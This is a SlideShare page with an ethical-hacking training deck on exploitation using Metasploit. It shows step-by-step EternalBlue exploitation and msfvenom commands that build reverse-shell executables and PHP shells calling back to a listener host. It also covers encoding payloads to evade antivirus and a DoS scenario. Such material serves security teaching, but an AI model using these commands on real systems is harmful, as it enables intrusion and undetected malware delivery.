SlideShare a Scribd company logo

Practical White Hat Hacker Training - Exploitation

PRISMA CSI, profile picture
PRISMA CSI

The document provides a comprehensive overview of exploitation techniques in cybersecurity, including types of exploits, exploit databases, and the usage of tools like the Metasploit framework. It covers various concepts such as payloads, exploit editing, and antivirus evasion strategies, while offering practical demonstrations for training purposes. Key features and commands related to Metasploit are detailed, aimed at equipping users with the knowledge to perform ethical hacking.

Education
1 of 65
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
www.prismacsi.com © All Rights Reserved. 1 Practical White Hat Hacker Training #5 Exploitation This document may be quoted or shared, but cannot be modified or used for commercial purposes. For more information, visit https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr
www.prismacsi.com © All Rights Reserved. 2 Exploit Stage Topics • What is an exploit? • Types of exploits • Local, remote and 0day exploits • Exploit Databases • Example Exploit Scenarios • Exploit Execution and Usage Scenarios • Exploit Frameworks • Payload Concept • Metasploit Framework • Antivirus Evasion Software • Veil-Evasion • Shellter • Application
www.prismacsi.com © All Rights Reserved. 3 Basic Concepts • What’s an exploit? • The name given to tools developed to exploit a vulnerability. • Also called exploitation code. • Local Exploit • Remote Exploit • Web Exploit • DoS Exploit • 0day Exploit • What’s a Payload? • A piece of malicious code that performs a given desired action after an exploit
www.prismacsi.com © All Rights Reserved. 4 Exploit Databases • A holding container for a massive number of exploits. Discovered/detected software and service exploits can be searched for in these databases. • Exploit-db.com • Securityfocus.com • 0day.today • Exploits.shodan.io • Iedb.ir • Cxsecurity.com/exploit • Rapid7.com/db
www.prismacsi.com © All Rights Reserved. 5 Exploit Development Languages • In which programming languages are exploits generally written? • Python • C / C++ • Perl • PHP • Ruby • Why was the Framework concept conceived? • Metasploit Framework example
www.prismacsi.com © All Rights Reserved. 6 Exploit Execution / Use– Demo
www.prismacsi.com © All Rights Reserved. 7 Exploit Editing • Exploits don’t execute on every system. • Parameters may vary according to features such as operating system, processor architecture, system language. • In this case you may need to edit the exploit and then execute it afterwards. • Replicas of target system can be created in a laboratory environment for experiments. • Assume you only have one chance to attack! • A system crash may be the end of everything.
www.prismacsi.com © All Rights Reserved. 8 Exploit Example - Scenario • Consider a bank’s credit calculation area! • Where is the calculation performed? ( Server? Client? ) • What if we perform the request specified in the scenario thousands of times within a minute? • This is an example of a simple DoS ExploitJ
www.prismacsi.com © All Rights Reserved. 9 Exploit Frameworks • Metasploit Community • Metasploit Pro • Core Impact • Exploithub • BeEF
www.prismacsi.com © All Rights Reserved. 10 Metasploit Framework • Metasploit Framework • Installation • Basic Commands • Auxiliary modules • Exploit use • Payload listi and Meterpreter use • Output analysis • Post Exploitation
www.prismacsi.com © All Rights Reserved. 11 Metasploit Framework • It’s an open source software. • Pro version is available but the community version will be sufficient for this course . • Exploits • Payloads • Auxiliary modules • Encoders • Post exploits
www.prismacsi.com © All Rights Reserved. 12 Metasploit Framework • Visit the link below for installation instructions: • https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers • Update: • msfupdate
www.prismacsi.com © All Rights Reserved. 13 Metasploit Framework
www.prismacsi.com © All Rights Reserved. 14 Metasploit Framework • Start • Begin by typing msfconsole in the command line. • You can check the database status with the following command: • db_status
www.prismacsi.com © All Rights Reserved. 15 Metasploit Framework • Workspace concept • Use the workspace to list all the available workspaces. • workspace -a prisma creates a prisma workspace. • workspace prisma Switch to prisma workspace. • workspace -d prisma delete the prisma workspace.
www.prismacsi.com © All Rights Reserved. 16 Metasploit Framework
www.prismacsi.com © All Rights Reserved. 17 Metasploit Framework • Working with Nessus, Nmap outputs You can use the output of scanning software in integration with metasploit. This is one of the best features of the Metasploit Framework. • db_import nmap.xml import nmap output. • db_import nessus-report.nessus import nessus output. • db_export -f xml /tmp/prisma.xml export the data in your workspace.
www.prismacsi.com © All Rights Reserved. 18 Metasploit Framework
www.prismacsi.com © All Rights Reserved. 19 Metasploit Framework
www.prismacsi.com © All Rights Reserved. 20 Metasploit Framework • Workspace data : • hosts • services • creds • loots
www.prismacsi.com © All Rights Reserved. 21 Metasploit Framework • Hosts command • Db_nmap –sS –Pn –n 10.0.1.0/24 You can perform nmap scans with the command. host command can be used to view all IP addresses discovered from the output of this command. • hosts –h You can access all the command functions with the above command • hosts –R Used to add addresses to the RHOST parameter.
www.prismacsi.com © All Rights Reserved. 22 Metasploit Framework
www.prismacsi.com © All Rights Reserved. 23 Metasploit Framework • Services command • db_nmap –sS –Pn –n 10.0.1.0/24 –sV Used to execute an nmap scan. After the output of this command, you can view the ports on all IP addresses and the services running on them with the services command. • services –h . You can access all the services command functions with the above command • services –p 445 • services –S http • services –p 80 -R
www.prismacsi.com © All Rights Reserved. 24 Metasploit Framework
www.prismacsi.com © All Rights Reserved. 25 Metasploit Basic Command List • help • Help command • banner • Allows you to take awesome screenshotsJ • info • Get information on any plugin • info exploit/windows/smb/psexec • search • Search command • search ms17-010
www.prismacsi.com © All Rights Reserved. 26 Metasploit Basic Command List • use • Select an exploit • use exploit/windows/smb/psexec • set • Exploit • info • Acquire information on any plugin • info exploit/windows/smb/psexec • search • Search command • search ms17-010
www.prismacsi.com © All Rights Reserved. 27 Metasploit Framework - Help
www.prismacsi.com © All Rights Reserved. 28 Metasploit Framework - Banner
www.prismacsi.com © All Rights Reserved. 29 Metasploit Framework - Info
www.prismacsi.com © All Rights Reserved. 30 Metasploit Basic Command List • set • Used to assign values to a parameter. • set RHOST 10.0.1.5 • setg • Used to assign a parameter value as global. • unset • Used to reset parameter values. • show • Show namesJ • use • Activates a plugin.
www.prismacsi.com © All Rights Reserved. 31 Metasploit Basic Command List • run and exploit • Used to run a plugin. • load and unload • Used to activate or deactivate a module. • exit • Exiting command
www.prismacsi.com © All Rights Reserved. 32 Metasploit Show Command • show payloads • List Payloads • show targets • List operating systems suitable for attacks with a given plugin • show options • Show setting parameters for a plugin • show encoders • List all encoders
www.prismacsi.com © All Rights Reserved. 33 Auxillary Modules and Use • show auxillary • search smb_login • use auxillary/dos/windows/rdp/ms12_020 • set RHOST • set RPORT • run
www.prismacsi.com © All Rights Reserved. 34 Exploit Attempt (MS17-010) • search netapi • info exploit/windows/smb/ms17_010_eternalblue • use exploit/windows/smb/ms17_010_eternalblue • show options • set payload windows/meterpreter/bind_tcp • set LHOST, • set RHOST • set RPORT • exploit
www.prismacsi.com © All Rights Reserved. 35 Payload Examples • set PAYLOAD windows/meterpreter/reverse_http • set PAYLOAD windows/shell/bind_tcp • set PAYLOAD linux/x86/meterpreter/reverse_https • set PAYLOAD php/meterpreter/bind_tcp • set PAYLOAD java/meterpreter/bind_tcp • set PAYLOAD /windows/vncinject/reverse_tcp
www.prismacsi.com © All Rights Reserved. 36 Reverse/Bind Shell
www.prismacsi.com © All Rights Reserved. 37 Session Management • exploit/multi/handler • Can be used as a listener. • Listener can be run as a job to get connections from multiple targets. • jobs : • exploit –j • jobs command is used for listing jobs.
www.prismacsi.com © All Rights Reserved. 38 Session Management • You can manage all sessions obtained with the sessions command. • sessions –l : list sessions • session –i 1 : 1. Interact with session • sessions –K : end all sessions • sessions –u : upgrade a session to meterpreter session • kill : used to kill a session. • background : takes the session into the background and returns to the metasploit console.
www.prismacsi.com © All Rights Reserved. 39 Exploit Search • Searchsploit
www.prismacsi.com © All Rights Reserved. 40 What’s Msfvenom? • There may be no direct vulnerability in the target system. • In this case, it may be necessary to try to penetrate the system in different ways. • For example if a created malicious .exe file is somehow successfully uploaded and executed on a system then the system can be captured. • Or you might want to upload a malicious shell written in php on to a web application with a file upload vulnerability and get a terminal connection on metasploit. • That's where msfvenom comes into play!
www.prismacsi.com © All Rights Reserved. 41 Msfvenom Use • Msfvenom basic commands • msfvenom -h • msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337-f exe > shell.exe • msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.10.10. lport=4444 -f raw > exp.php • msfvenom - p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=4444 -f war -a x86
www.prismacsi.com © All Rights Reserved. 42 Msfvenom AV Evasion- Demonstration • msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337 -e x86/shikata_ga_nai -i 15 -f exe -o shell.exe
www.prismacsi.com © All Rights Reserved. 43 Msfvenom Help
www.prismacsi.com © All Rights Reserved. 44 Msfvenom PHP Payload Contents
www.prismacsi.com © All Rights Reserved. 45 Download Metasploit Additional Plugins • https://github.com/darkoperator/Metasploit-Plugins
www.prismacsi.com © All Rights Reserved. 46 Loading Metasploit Features • Files are added manually under ~/.msf4/plugin/
www.prismacsi.com © All Rights Reserved. 47 Armitage Use • Metasploit Framework GUI • Used to perform actions quickly • The interface is a little easier to use compared to the console application
www.prismacsi.com © All Rights Reserved. 48 Armitage Use • Adding a host
www.prismacsi.com © All Rights Reserved. 49 Armitage Use • Host scanning
www.prismacsi.com © All Rights Reserved. 50 Armitage Use • Scan Results
www.prismacsi.com © All Rights Reserved. 51 Armitage Use • Finding an attack vector
www.prismacsi.com © All Rights Reserved. 52 Armitage Use • Java_rmi_attack
www.prismacsi.com © All Rights Reserved. 53 Armitage Use • Java_rmi_attack • Meterpreter session
www.prismacsi.com © All Rights Reserved. 54 Antivirus Evasion Tools • An antivirus mechanism may be found in target systems. • In this case the attacks should be performed with much more caution. • There are tools developed to bypass antiviruses. • Used tools • Veil-Evasion • Shellter • Av0id • Msfvenom
www.prismacsi.com © All Rights Reserved. 55 Veil-Evasion Installation
www.prismacsi.com © All Rights Reserved. 56 Veil-Evasion Payload Selection
www.prismacsi.com © All Rights Reserved. 57 Veil-Evasion Payload Configuration
www.prismacsi.com © All Rights Reserved. 58 Veil-Evasion Payload Creation - DEMO
www.prismacsi.com © All Rights Reserved. 59 Virustotal Scanning
www.prismacsi.com © All Rights Reserved. 60 Shellter Installation
www.prismacsi.com © All Rights Reserved. 61 Shellter Use – DEMO
www.prismacsi.com © All Rights Reserved. 62 Virustotal Scanning
www.prismacsi.com © All Rights Reserved. 63 Applications
www.prismacsi.com © All Rights Reserved. 64 Questions?
www.prismacsi.com © All Rights Reserved. 65 www.prismacsi.com info@prismacsi.com 0 850 303 85 35 /prismacsi Contacts

More Related Content

PDF
Practical White Hat Hacker Training - Vulnerability Detection
PRISMA CSI
 
PDF
Practical White Hat Hacker Training - Active Information Gathering
PRISMA CSI
 
PDF
Practical White Hat Hacker Training - Post Exploitation
PRISMA CSI
 
PDF
Practical White Hat Hacker Training - Introduction to Cyber Security
PRISMA CSI
 
PPTX
Detection Rules Coverage
Sunny Neo
 
PDF
Web security for developers
Sunny Neo
 
PPTX
DC612 Day - Hands on Penetration Testing 101
dc612
 
PDF
Coporate Espionage
UTD Computer Security Group
 
Practical White Hat Hacker Training - Vulnerability Detection
PRISMA CSI
 
Practical White Hat Hacker Training - Active Information Gathering
PRISMA CSI
 
Practical White Hat Hacker Training - Post Exploitation
PRISMA CSI
 
Practical White Hat Hacker Training - Introduction to Cyber Security
PRISMA CSI
 
Detection Rules Coverage
Sunny Neo
 
Web security for developers
Sunny Neo
 
DC612 Day - Hands on Penetration Testing 101
dc612
 
Coporate Espionage
UTD Computer Security Group
 

What's hot (20)

PDF
Introduction to red team operations
Sunny Neo
 
PDF
Threat Con 2021: What's Hitting my Honeypots
APNIC
 
PDF
Lateral Movement: How attackers quietly traverse your Network
EC-Council
 
PDF
Infosecurity.be 2019: What are relevant open source security tools you should...
B.A.
 
PDF
Csw2016 freingruber bypassing_application_whitelisting
CanSecWest
 
PPTX
Sticky Keys to the Kingdom
Dennis Maldonado
 
PDF
Internal Pentest: from z3r0 to h3r0
marcioalma
 
PPTX
ModSecurity and NGINX: Tuning the OWASP Core Rule Set
NGINX, Inc.
 
PPTX
External to DA, the OS X Way
Stephan Borosh
 
PDF
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
EC-Council
 
PPTX
Outlook and Exchange for the bad guys
Nick Landers
 
PDF
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CanSecWest
 
PDF
Security events in 2014
Chong-Kuan Chen
 
PDF
ModSecurity and NGINX: Tuning the OWASP Core Rule Set - EMEA
NGINX, Inc.
 
PDF
Anatomy of a Cloud Hack
NotSoSecure Global Services
 
PDF
1000 to 0
Sunny Neo
 
PDF
Ch 6: Attacking Authentication
Sam Bowne
 
PPTX
Breadcrumbs to Loaves: BSides Austin '17
Brandon Arvanaghi
 
PDF
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 
PPTX
Lateral Movement - Phreaknik 2016
Xavier Ashe
 
Introduction to red team operations
Sunny Neo
 
Threat Con 2021: What's Hitting my Honeypots
APNIC
 
Lateral Movement: How attackers quietly traverse your Network
EC-Council
 
Infosecurity.be 2019: What are relevant open source security tools you should...
B.A.
 
Csw2016 freingruber bypassing_application_whitelisting
CanSecWest
 
Sticky Keys to the Kingdom
Dennis Maldonado
 
Internal Pentest: from z3r0 to h3r0
marcioalma
 
ModSecurity and NGINX: Tuning the OWASP Core Rule Set
NGINX, Inc.
 
External to DA, the OS X Way
Stephan Borosh
 
SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell a...
EC-Council
 
Outlook and Exchange for the bad guys
Nick Landers
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CanSecWest
 
Security events in 2014
Chong-Kuan Chen
 
ModSecurity and NGINX: Tuning the OWASP Core Rule Set - EMEA
NGINX, Inc.
 
Anatomy of a Cloud Hack
NotSoSecure Global Services
 
1000 to 0
Sunny Neo
 
Ch 6: Attacking Authentication
Sam Bowne
 
Breadcrumbs to Loaves: BSides Austin '17
Brandon Arvanaghi
 
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 
Lateral Movement - Phreaknik 2016
Xavier Ashe
 

Similar to Practical White Hat Hacker Training - Exploitation (20)

PDF
Metasploit Humla for Beginner
n|u - The Open Security Community
 
PDF
01 Metasploit kung fu introduction
Mostafa Abdel-sallam
 
PPTX
Metasploit
Raghunath G
 
PDF
Metasploit: Pwnage and Ponies
Trowalts
 
PPTX
Pentesting with linux
Hammad Ahmed Khawaja
 
PPTX
Metasploit framwork
Deepanshu Gajbhiye
 
PDF
Metasploit Computer security testing tool
medoelkang600
 
PPTX
Finalppt metasploit
devilback
 
DOCX
Backtrack Manual Part6
Nutan Kumar Panda
 
PPTX
Intro to exploits in metasploitand payloads in msfvenom
Siddharth Krishna Kumar
 
PPTX
Introduction To Exploitation & Metasploit
Raghav Bisht
 
PDF
24 33 -_metasploit
wozgeass
 
PDF
Metasploit for Penetration Testing: Beginner Class
Georgia Weidman
 
PPTX
Metasploit Framework and Payloads supported
Swapnil Gharat
 
PPTX
metaploit framework
Le Quyen
 
PDF
Metasploit
noc_313
 
PDF
Open Source Cyber Weaponry
Joshua L. Davis
 
DOCX
Backtrack Manual Part7
Nutan Kumar Panda
 
PPTX
Metasploit
Institute of Information Security (IIS)
 
PDF
SSMF (Security Scope Metasploit Framework) - Course Syllabus
Security Scope
 
Metasploit Humla for Beginner
n|u - The Open Security Community
 
01 Metasploit kung fu introduction
Mostafa Abdel-sallam
 
Metasploit
Raghunath G
 
Metasploit: Pwnage and Ponies
Trowalts
 
Pentesting with linux
Hammad Ahmed Khawaja
 
Metasploit framwork
Deepanshu Gajbhiye
 
Metasploit Computer security testing tool
medoelkang600
 
Finalppt metasploit
devilback
 
Backtrack Manual Part6
Nutan Kumar Panda
 
Intro to exploits in metasploitand payloads in msfvenom
Siddharth Krishna Kumar
 
Introduction To Exploitation & Metasploit
Raghav Bisht
 
24 33 -_metasploit
wozgeass
 
Metasploit for Penetration Testing: Beginner Class
Georgia Weidman
 
Metasploit Framework and Payloads supported
Swapnil Gharat
 
metaploit framework
Le Quyen
 
Metasploit
noc_313
 
Open Source Cyber Weaponry
Joshua L. Davis
 
Backtrack Manual Part7
Nutan Kumar Panda
 
Metasploit
Institute of Information Security (IIS)
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
Security Scope
 

More from PRISMA CSI (12)

PDF
Sysmon ile Log Toplama
PRISMA CSI
 
PDF
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
PRISMA CSI
 
PDF
Beyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma Saldırıları
PRISMA CSI
 
PDF
Sızma Testi Metodolojileri
PRISMA CSI
 
PDF
Sızma (Penetrasyon) Testi Nedir?
PRISMA CSI
 
PDF
Beyaz Şapkalı Hacker CEH Eğitimi - Post Exploit Aşaması
PRISMA CSI
 
PDF
Beyaz Şapkalı Hacker CEH Eğitimi - Zafiyet Keşfi
PRISMA CSI
 
PDF
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
PRISMA CSI
 
PDF
Beyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi Toplama
PRISMA CSI
 
PDF
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
PRISMA CSI
 
PDF
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
PRISMA CSI
 
PDF
Kaynak Kod Analiz Süreci
PRISMA CSI
 
Sysmon ile Log Toplama
PRISMA CSI
 
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
PRISMA CSI
 
Beyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma Saldırıları
PRISMA CSI
 
Sızma Testi Metodolojileri
PRISMA CSI
 
Sızma (Penetrasyon) Testi Nedir?
PRISMA CSI
 
Beyaz Şapkalı Hacker CEH Eğitimi - Post Exploit Aşaması
PRISMA CSI
 
Beyaz Şapkalı Hacker CEH Eğitimi - Zafiyet Keşfi
PRISMA CSI
 
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
PRISMA CSI
 
Beyaz Şapkalı Hacker CEH Eğitimi - Aktif Bilgi Toplama
PRISMA CSI
 
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
PRISMA CSI
 
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
PRISMA CSI
 
Kaynak Kod Analiz Süreci
PRISMA CSI
 

Recently uploaded (20)

PDF
TR - Agricultural Crops Production NC III.pdf
avgilmegino3
 
PDF
Physiotherapy_for_Respiratory_and_Cardiac_Problems WEBBER.pdf
DrMONISHAphysio
 
PPTX
Final Presentation General Medicine 03-08-2024.pptx
ZaheerAhmad228692
 
PDF
STATICS OF THE RIGID BODIES Hibbelers.pdf
pascualasturiaskaye4
 
PPTX
Pharmacology of Heart Failure /Pharmacotherapy of CHF
Rajshri Ghogare
 
PDF
Computing-Curriculum for Schools in Ghana
abigailanane203
 
PPTX
PPH.pptx obstetrics and gynecology in nursing
SrideviDevaraj5
 
PDF
2.FourierTransform-ShortQuestionswithAnswers.pdf
Raji Murugan
 
PDF
The Lost Whites of Pakistan by Jahanzaib Mughal.pdf
jahanzaibmughal6
 
PDF
BÀI TẬP BỔ TRỢ 4 KỸ NĂNG TIẾNG ANH 9 GLOBAL SUCCESS - CẢ NĂM - BÁM SÁT FORM Đ...
Nguyen Thanh Tu Collection
 
PPTX
Pharma ospi slides which help in ospi learning
rameetkumar304
 
PDF
O7-L3 Supply Chain Operations - ICLT Program
labyankof
 
PDF
Insiders guide to clinical Medicine.pdf
AbhishekPatil315128
 
PDF
Microbial disease of the cardiovascular and lymphatic systems
KeyaSharma
 
PDF
Module 4: Burden of Disease Tutorial Slides S2 2025
Jonathan Hallett
 
PPTX
IMMUNITY IMMUNITY refers to protection against infection, and the immune syst...
shilpa939953
 
PPTX
Microbial diseases, their pathogenesis and prophylaxis
DevlinaSengupta
 
PDF
ANTIBIOTICS.pptx.pdf………………… xxxxxxxxxxxxx
HakHe
 
PDF
Abdominal Access Techniques with Prof. Dr. R K Mishra
mohitsuren827
 
PPTX
PPT- ENG7_QUARTER1_LESSON1_WEEK1. IMAGERY -DESCRIPTIONS pptx.pptx
KMDee
 
TR - Agricultural Crops Production NC III.pdf
avgilmegino3
 
Physiotherapy_for_Respiratory_and_Cardiac_Problems WEBBER.pdf
DrMONISHAphysio
 
Final Presentation General Medicine 03-08-2024.pptx
ZaheerAhmad228692
 
STATICS OF THE RIGID BODIES Hibbelers.pdf
pascualasturiaskaye4
 
Pharmacology of Heart Failure /Pharmacotherapy of CHF
Rajshri Ghogare
 
Computing-Curriculum for Schools in Ghana
abigailanane203
 
PPH.pptx obstetrics and gynecology in nursing
SrideviDevaraj5
 
2.FourierTransform-ShortQuestionswithAnswers.pdf
Raji Murugan
 
The Lost Whites of Pakistan by Jahanzaib Mughal.pdf
jahanzaibmughal6
 
BÀI TẬP BỔ TRỢ 4 KỸ NĂNG TIẾNG ANH 9 GLOBAL SUCCESS - CẢ NĂM - BÁM SÁT FORM Đ...
Nguyen Thanh Tu Collection
 
Pharma ospi slides which help in ospi learning
rameetkumar304
 
O7-L3 Supply Chain Operations - ICLT Program
labyankof
 
Insiders guide to clinical Medicine.pdf
AbhishekPatil315128
 
Microbial disease of the cardiovascular and lymphatic systems
KeyaSharma
 
Module 4: Burden of Disease Tutorial Slides S2 2025
Jonathan Hallett
 
IMMUNITY IMMUNITY refers to protection against infection, and the immune syst...
shilpa939953
 
Microbial diseases, their pathogenesis and prophylaxis
DevlinaSengupta
 
ANTIBIOTICS.pptx.pdf………………… xxxxxxxxxxxxx
HakHe
 
Abdominal Access Techniques with Prof. Dr. R K Mishra
mohitsuren827
 
PPT- ENG7_QUARTER1_LESSON1_WEEK1. IMAGERY -DESCRIPTIONS pptx.pptx
KMDee
 

Practical White Hat Hacker Training - Exploitation

  • 1. www.prismacsi.com © All Rights Reserved. 1 Practical White Hat Hacker Training #5 Exploitation This document may be quoted or shared, but cannot be modified or used for commercial purposes. For more information, visit https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr
  • 2. www.prismacsi.com © All Rights Reserved. 2 Exploit Stage Topics • What is an exploit? • Types of exploits • Local, remote and 0day exploits • Exploit Databases • Example Exploit Scenarios • Exploit Execution and Usage Scenarios • Exploit Frameworks • Payload Concept • Metasploit Framework • Antivirus Evasion Software • Veil-Evasion • Shellter • Application
  • 3. www.prismacsi.com © All Rights Reserved. 3 Basic Concepts • What’s an exploit? • The name given to tools developed to exploit a vulnerability. • Also called exploitation code. • Local Exploit • Remote Exploit • Web Exploit • DoS Exploit • 0day Exploit • What’s a Payload? • A piece of malicious code that performs a given desired action after an exploit
  • 4. www.prismacsi.com © All Rights Reserved. 4 Exploit Databases • A holding container for a massive number of exploits. Discovered/detected software and service exploits can be searched for in these databases. • Exploit-db.com • Securityfocus.com • 0day.today • Exploits.shodan.io • Iedb.ir • Cxsecurity.com/exploit • Rapid7.com/db
  • 5. www.prismacsi.com © All Rights Reserved. 5 Exploit Development Languages • In which programming languages are exploits generally written? • Python • C / C++ • Perl • PHP • Ruby • Why was the Framework concept conceived? • Metasploit Framework example
  • 6. www.prismacsi.com © All Rights Reserved. 6 Exploit Execution / Use– Demo
  • 7. www.prismacsi.com © All Rights Reserved. 7 Exploit Editing • Exploits don’t execute on every system. • Parameters may vary according to features such as operating system, processor architecture, system language. • In this case you may need to edit the exploit and then execute it afterwards. • Replicas of target system can be created in a laboratory environment for experiments. • Assume you only have one chance to attack! • A system crash may be the end of everything.
  • 8. www.prismacsi.com © All Rights Reserved. 8 Exploit Example - Scenario • Consider a bank’s credit calculation area! • Where is the calculation performed? ( Server? Client? ) • What if we perform the request specified in the scenario thousands of times within a minute? • This is an example of a simple DoS ExploitJ
  • 9. www.prismacsi.com © All Rights Reserved. 9 Exploit Frameworks • Metasploit Community • Metasploit Pro • Core Impact • Exploithub • BeEF
  • 10. www.prismacsi.com © All Rights Reserved. 10 Metasploit Framework • Metasploit Framework • Installation • Basic Commands • Auxiliary modules • Exploit use • Payload listi and Meterpreter use • Output analysis • Post Exploitation
  • 11. www.prismacsi.com © All Rights Reserved. 11 Metasploit Framework • It’s an open source software. • Pro version is available but the community version will be sufficient for this course . • Exploits • Payloads • Auxiliary modules • Encoders • Post exploits
  • 12. www.prismacsi.com © All Rights Reserved. 12 Metasploit Framework • Visit the link below for installation instructions: • https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers • Update: • msfupdate
  • 13. www.prismacsi.com © All Rights Reserved. 13 Metasploit Framework
  • 14. www.prismacsi.com © All Rights Reserved. 14 Metasploit Framework • Start • Begin by typing msfconsole in the command line. • You can check the database status with the following command: • db_status
  • 15. www.prismacsi.com © All Rights Reserved. 15 Metasploit Framework • Workspace concept • Use the workspace to list all the available workspaces. • workspace -a prisma creates a prisma workspace. • workspace prisma Switch to prisma workspace. • workspace -d prisma delete the prisma workspace.
  • 16. www.prismacsi.com © All Rights Reserved. 16 Metasploit Framework
  • 17. www.prismacsi.com © All Rights Reserved. 17 Metasploit Framework • Working with Nessus, Nmap outputs You can use the output of scanning software in integration with metasploit. This is one of the best features of the Metasploit Framework. • db_import nmap.xml import nmap output. • db_import nessus-report.nessus import nessus output. • db_export -f xml /tmp/prisma.xml export the data in your workspace.
  • 18. www.prismacsi.com © All Rights Reserved. 18 Metasploit Framework
  • 19. www.prismacsi.com © All Rights Reserved. 19 Metasploit Framework
  • 20. www.prismacsi.com © All Rights Reserved. 20 Metasploit Framework • Workspace data : • hosts • services • creds • loots
  • 21. www.prismacsi.com © All Rights Reserved. 21 Metasploit Framework • Hosts command • Db_nmap –sS –Pn –n 10.0.1.0/24 You can perform nmap scans with the command. host command can be used to view all IP addresses discovered from the output of this command. • hosts –h You can access all the command functions with the above command • hosts –R Used to add addresses to the RHOST parameter.
  • 22. www.prismacsi.com © All Rights Reserved. 22 Metasploit Framework
  • 23. www.prismacsi.com © All Rights Reserved. 23 Metasploit Framework • Services command • db_nmap –sS –Pn –n 10.0.1.0/24 –sV Used to execute an nmap scan. After the output of this command, you can view the ports on all IP addresses and the services running on them with the services command. • services –h . You can access all the services command functions with the above command • services –p 445 • services –S http • services –p 80 -R
  • 24. www.prismacsi.com © All Rights Reserved. 24 Metasploit Framework
  • 25. www.prismacsi.com © All Rights Reserved. 25 Metasploit Basic Command List • help • Help command • banner • Allows you to take awesome screenshotsJ • info • Get information on any plugin • info exploit/windows/smb/psexec • search • Search command • search ms17-010
  • 26. www.prismacsi.com © All Rights Reserved. 26 Metasploit Basic Command List • use • Select an exploit • use exploit/windows/smb/psexec • set • Exploit • info • Acquire information on any plugin • info exploit/windows/smb/psexec • search • Search command • search ms17-010
  • 27. www.prismacsi.com © All Rights Reserved. 27 Metasploit Framework - Help
  • 28. www.prismacsi.com © All Rights Reserved. 28 Metasploit Framework - Banner
  • 29. www.prismacsi.com © All Rights Reserved. 29 Metasploit Framework - Info
  • 30. www.prismacsi.com © All Rights Reserved. 30 Metasploit Basic Command List • set • Used to assign values to a parameter. • set RHOST 10.0.1.5 • setg • Used to assign a parameter value as global. • unset • Used to reset parameter values. • show • Show namesJ • use • Activates a plugin.
  • 31. www.prismacsi.com © All Rights Reserved. 31 Metasploit Basic Command List • run and exploit • Used to run a plugin. • load and unload • Used to activate or deactivate a module. • exit • Exiting command
  • 32. www.prismacsi.com © All Rights Reserved. 32 Metasploit Show Command • show payloads • List Payloads • show targets • List operating systems suitable for attacks with a given plugin • show options • Show setting parameters for a plugin • show encoders • List all encoders
  • 33. www.prismacsi.com © All Rights Reserved. 33 Auxillary Modules and Use • show auxillary • search smb_login • use auxillary/dos/windows/rdp/ms12_020 • set RHOST • set RPORT • run
  • 34. www.prismacsi.com © All Rights Reserved. 34 Exploit Attempt (MS17-010) • search netapi • info exploit/windows/smb/ms17_010_eternalblue • use exploit/windows/smb/ms17_010_eternalblue • show options • set payload windows/meterpreter/bind_tcp • set LHOST, • set RHOST • set RPORT • exploit
  • 35. www.prismacsi.com © All Rights Reserved. 35 Payload Examples • set PAYLOAD windows/meterpreter/reverse_http • set PAYLOAD windows/shell/bind_tcp • set PAYLOAD linux/x86/meterpreter/reverse_https • set PAYLOAD php/meterpreter/bind_tcp • set PAYLOAD java/meterpreter/bind_tcp • set PAYLOAD /windows/vncinject/reverse_tcp
  • 36. www.prismacsi.com © All Rights Reserved. 36 Reverse/Bind Shell
  • 37. www.prismacsi.com © All Rights Reserved. 37 Session Management • exploit/multi/handler • Can be used as a listener. • Listener can be run as a job to get connections from multiple targets. • jobs : • exploit –j • jobs command is used for listing jobs.
  • 38. www.prismacsi.com © All Rights Reserved. 38 Session Management • You can manage all sessions obtained with the sessions command. • sessions –l : list sessions • session –i 1 : 1. Interact with session • sessions –K : end all sessions • sessions –u : upgrade a session to meterpreter session • kill : used to kill a session. • background : takes the session into the background and returns to the metasploit console.
  • 39. www.prismacsi.com © All Rights Reserved. 39 Exploit Search • Searchsploit
  • 40. www.prismacsi.com © All Rights Reserved. 40 What’s Msfvenom? • There may be no direct vulnerability in the target system. • In this case, it may be necessary to try to penetrate the system in different ways. • For example if a created malicious .exe file is somehow successfully uploaded and executed on a system then the system can be captured. • Or you might want to upload a malicious shell written in php on to a web application with a file upload vulnerability and get a terminal connection on metasploit. • That's where msfvenom comes into play!
